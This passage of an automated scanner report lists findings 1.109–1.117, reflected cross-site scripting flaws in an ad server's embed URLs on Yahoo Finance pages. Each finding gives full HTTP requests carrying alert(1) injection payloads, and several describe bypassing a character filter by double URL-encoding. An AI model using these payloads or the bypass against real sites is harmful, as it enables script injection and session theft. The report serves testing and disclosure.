P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 737

   function wsod_image475() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*6278d'-alert(1)-'7ee5cbd0701http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.832.iframe.200x33/**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more
...[SNIP]...

1.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c61f0'-alert(1)-'0857629a808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&c61f0'-alert(1)-'0857629a808=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:12:14 GMT; path=/
Set-Cookie: i_1=46:475:844:132:0:42331:1300828334:L|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2; expires=Thu, 21-Apr-2011 21:12:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 744

   function wsod_image475() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&c61f0'-alert(1)-'0857629a808=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo
...[SNIP]...

1.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c69b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ee33c46e6 was submitted in the REST URL parameter 2. This input was echoed as 8c69b"><script>alert(1)</script>a1ee33c46e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578c69b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ee33c46e6/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2682

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578c69b"><script>alert(1)</script>a1ee33c46e6/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a2d%2522%253balert%25281%2529%252f%252f9b048b2d465 was submitted in the REST URL parameter 2. This input was echoed as 75a2d";alert(1)//9b048b2d465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135775a2d%2522%253balert%25281%2529%252f%252f9b048b2d465/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135775a2d";alert(1)//9b048b2d465/477.0.iframe.150x30/1300830283**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2
...[SNIP]...

1.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4e79a71ebb9 was submitted in the REST URL parameter 3. This input was echoed as b53f9"><script>alert(1)</script>4e79a71ebb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30b53f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4e79a71ebb9/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2682

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30b53f9"><script>alert(1)</script>4e79a71ebb9/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5c2a%2522%253balert%25281%2529%252f%252f2ded99f30ec was submitted in the REST URL parameter 3. This input was echoed as e5c2a";alert(1)//2ded99f30ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e5c2a%2522%253balert%25281%2529%252f%252f2ded99f30ec/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e5c2a";alert(1)//2ded99f30ec/1300830300**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=21422
...[SNIP]...

1.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26d"><script>alert(1)</script>3c4129e8ac6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ee26d"><script>alert(1)</script>3c4129e8ac6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ee26d"><script>alert(1)</script>3c4129e8ac6http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9c5"-alert(1)-"809976504ec was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ba9c5"-alert(1)-"809976504ec HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2609

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ba9c5"-alert(1)-"809976504ec">
...[SNIP]...

1.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b01df"-alert(1)-"47e327ecc57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&b01df"-alert(1)-"47e327ecc57=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2615

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&b01df"-alert(1)-"47e327ecc57=1">
...[SNIP]...

1.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d34e8"><script>alert(1)</script>2724b554218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&d34e8"><script>alert(1)</script>2724b554218=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
